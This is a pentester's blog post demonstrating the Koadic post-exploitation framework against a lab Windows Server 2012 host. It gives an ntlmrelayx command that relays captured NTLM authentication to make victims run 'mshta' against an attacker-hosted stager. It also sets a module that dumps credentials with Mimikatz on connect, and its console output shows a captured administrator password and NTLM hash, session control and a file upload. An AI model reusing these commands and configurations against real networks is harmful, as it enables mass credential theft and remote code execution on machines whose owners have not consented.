Overview

I LOVE KOADIC!! Yes this doesn't work out of the box against Windows 10+ machines but if you find yourself on a network with older Windows 7 and Windows Server 2012 and below machines Koadic will gobble the network whole and very quickly. I guess I should note that much of what I love about it is it's organization and implementation of Mimikatz which is probably the real MVP of the tool. It also does a fantastic job of enumerating domain information that can be used alongside of your Bloodhound enumeration as well. I also really really love the creds functionality and how it stores captured credentials and allows you to search through them at will. After you conduct your domain enumeration it even identifies credentials that belong to Domain Admins!

Download Koadic!

How I Use it on Internals

So what I do on internals is have NTLMRELAYx execute the staging command when using Responder to man-in-the-middle LLMNR traffic. Since this isn't a full blown tutorial on that process and one focused solely on Koadic I'll leave you with the command I generally use with NTLMRELAYx:

sudo ntlmrelayx.py -tf smb_off_hosts -smb2support --enum-local-admins -of 'save_the_NTLMv2hashes.txt' -c 'mshta http://AttackingHost:9999/sploit'      

Because Koadic lets you run Mimikatz as soon as you can get a connect-back this will result in RAINING SHELLS WITH RAINING PLAIN-TEXT CREDS!!!! No joke, you could get sets of Domain/Enterprise Admin creds AND hundreds of sessions if SMB Signing is disabled on internal networks. Yes, by doing this I have had over 200 shells/zombies at a once before on an internal assessment (counter productive and unnecessary I know). It was primarily due to the high volume of SMB traffic.

What I Did for You Guys

So for this blog, I took some time and spun up an AWS Windows 2012 instance (something seen often on internals) just so I can show off some of the functionality. As usual the next section is going to be pretty fast pace so you guys can ingest this stuff as quickly and as clearly as possible. Let's get you guys to a point where you can wreck with this thing already!

Hacking things - TLDRs Start Here ⤵

When you start using Koadic obviously you need to pip3 the "reqs" and get it setup for usage. After you launch it you should see the main screen. In this screenshot you can see I set the end part of the staging URL to be sploit by using [set ENDPOINT sploit]. I also set up the stager to run Mimikatz on anything that connects to it by configuring the module using [set MODULE implant/inject/mimikatz_dotnet2js]. If you have a network with a lot of:

Koadic Settings
Koadic Settings

For demonstrative purposes I executed the mshta through windows explorer like so:

Executing Stager on Windows
Executing Stager on Windows

Once you get an active session (zombie) the fun really begins. Because I had the module set to run Mimikatz immediately on connect you can see that plain-text creds are dumped as soon as the Windows Server 2012 host calls back to my attacking machine. You can see that both a NTLM hash and plan-text credentials were recovered:


(koadic: sta/js/mshta)$ run
[+] Spawned a stager at http://AttackingIP:9999/sploit
[!] Dont edit this URL! (See: 'help portfwd')
[>] mshta http://AttackingIP:9999/sploit
[+] Zombie 0: Staging new connection (100.27.25.153)
[+] Zombie 0: WIN-LKC4723RPHF\Administrator* @ WIN-LKC4723RPHF -- Windows Server 2012 Standard
[*] Zombie 0: Job 0 (stager/js/mshta) created.
[+] Zombie 0: Job 0 (stager/js/mshta) privilege::debug -> got SeDebugPrivilege!
[+] Zombie 0: Job 0 (stager/js/mshta) token::elevate -> got SYSTEM!
[+] Zombie 0: Job 0 (stager/js/mshta) completed.
[+] Zombie 0: Job 0 (stager/js/mshta) Results

msv credentials
===============

NTLM                              SHA1                                      Username       Domain
----                              ----                                      --------       ------
9554475ea7e7f7c98c617ddbba4c55d8  b77ce05a098def8bd2b29a096faaf8957e7282a1  Administrator  WIN-LKC4723RPHF

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-LKC4723RPHF  qLTWjy%P=9
WIN-LKC4723RPHF\$  WORKGROUP        (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-LKC4723RPHF  (null)
win-lkc4723rphf\$  WORKGROUP        (null)
Dumping Creds upon Connection

If you want to check the status of the compromised hosts that you have so far you can use the command [Zombies].


(koadic: sta/js/mshta)$ zombies

        ID   IP              STATUS  LAST SEEN       
        ---  ---------       ------- ------------    
        0    75.233.122.16   Dead    2019-08-03 04:22:37
        1*   171.31.92.16    Alive   2019-08-03 04:25:55

Use "zombies ID" for detailed information about a session.
Use "zombies IP" for sessions on a particular host.
Use "zombies DOMAIN" for sessions on a particular Windows domain.
Use "zombies killed" for sessions that have been manually killed.
Active and Dead Sessions

If you've got any active jobs running, the [Jobs] command will display them for you so you can see what finished and what failed:

(koadic: sta/js/mshta)$ jobs

        ID   STATUS    ZOMBIE              NAME                                    
        ---- --------- ----------          --------------------                    
        0    Complete  171.31.92.16 (1)    stager/js/mshta                         
Koadic Displaying a jobs status

Similarly, [Creds] will display all of the credentials Koadic was able to capture and display them in nice, neat output for you:

(koadic: sta/js/mshta)$ creds

        Cred ID  IP               USERNAME            DOMAIN              PASSWORD                 NTLM                                      
        -------  --               --------            ------              --------                 ----                                      
        0        171.31.92.16     Administrator       WIN-LKC4723RPHF     qLTWjy%P=9               9554475ea7e7f7c98c617ddbba4c55d8          

Koadic Displaying Saved Creds

Koadic has a bunch of other handy modules. Just for a practicality I chose to show you guys the file upload utility. Here, I just uploaded a picture that I had lying around:

(koadic: sta/js/mshta)$ use implant/util/upload_file
(koadic: imp/uti/upload_file)$ options

        NAME        VALUE               REQ     DESCRIPTION     
        -----       ------------        ----    -------------   
        LFILE                           yes     local file to upload
        DIRECTORY   %TEMP%              no      writeable directory
        ZOMBIE      ALL                 yes     the zombie to target

(koadic: imp/uti/upload_file)$ set LFILE Knuclkes.png
[+] LFILE => Knuclkes.png
(koadic: imp/uti/upload_file)$ set DIRECTORY c:\\users\\administrator\\desktop
[+] DIRECTORY => c:\\users\\administrator\\desktop
(koadic: imp/uti/upload_file)$ run
[*] Zombie 0: Job 1 (implant/util/upload_file) created.
[*] Zombie 1: Job 2 (implant/util/upload_file) created.
[+] Zombie 1: Job 2 (implant/util/upload_file) completed.
Options Used to Upload Files

And the result:

Result of File Upload
Result of File Upload

At this point you pretty much get the picture. Koadic can do a ton of other cool things too. When it works it destroys!

____________
< K0ad1c R0x >
------------
\     ____________
 \    |__________|
     /           /\
    /           /  \
   /___________/___/|
   |          |     |
   |  ==\ /== |     |
   |   O   O  | \ \ |
   |     <    |  \ \|
  /|          |   \ \
 / |  \_____/ |   / /
/ /|          |  / /|
/||\|          | /||\/
   -------------|   
       | |    | |
      <__/    \__>

For those of you that care here’s my test boxes system information:

Image of Windows 2012 information
Image of Windows Server 2012 Test Machine